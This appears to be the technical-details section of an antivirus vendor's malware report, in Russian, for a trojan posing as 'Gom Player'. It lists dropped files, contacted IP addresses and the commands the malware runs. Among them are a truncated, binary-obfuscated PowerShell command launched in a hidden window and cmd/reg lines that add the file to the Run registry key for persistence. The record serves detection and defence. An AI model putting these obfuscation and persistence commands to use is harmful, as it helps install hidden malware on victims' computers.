Техническая информация
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'Gom Player' = '%LOCALAPPDATA%\Gom Player.exe'
- '<SYSTEM32>\cmd.exe' /c POwersHell -cOmManD " -JOIN((101000,1001110,1100101,1110111 ,101101 , 1001111 , 1100010 , 1101010 ,1100101, 1100011, 1110100 ,100000, 1010011,1111001 , 1110011 , 1110100,1100101,1101101,10...
- gom.exe
- C:\users\public\gom.exe
- %LOCALAPPDATA%\gom player.exe
- '66.##4.112.212':80
- '66.##4.103.106':13377
- 'C:\users\public\gom.exe'
- '<SYSTEM32>\cmd.exe' /c POwersHell -cOmManD " -JOIN((101000,1001110,1100101,1110111 ,101101 , 1001111 , 1100010 , 1101010 ,1100101, 1100011, 1110100 ,100000, 1010011,1111001 , 1110011 , 1110100,1100101,1101101,10...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -cOmManD " -JOIN((101000,1001110,1100101,1110111 ,101101 , 1001111 , 1100010 , 1101010 ,1100101, 1100011, 1110100 ,100000, 1010011,1111001 , 1110011 , 1110100,1100101,1101101,101110 ,1001110,11...
- '%WINDIR%\syswow64\cmd.exe' /c copy "C:\Users\Public\GOM.exe" "C:\Users\%username%\AppData\Local\Gom Player.exe" & REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Gom Player" /t REG_SZ /F /D "C:\Users\%us...
- '%WINDIR%\syswow64\reg.exe' ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Gom Player" /t REG_SZ /F /D "%LOCALAPPDATA%\Gom Player.exe"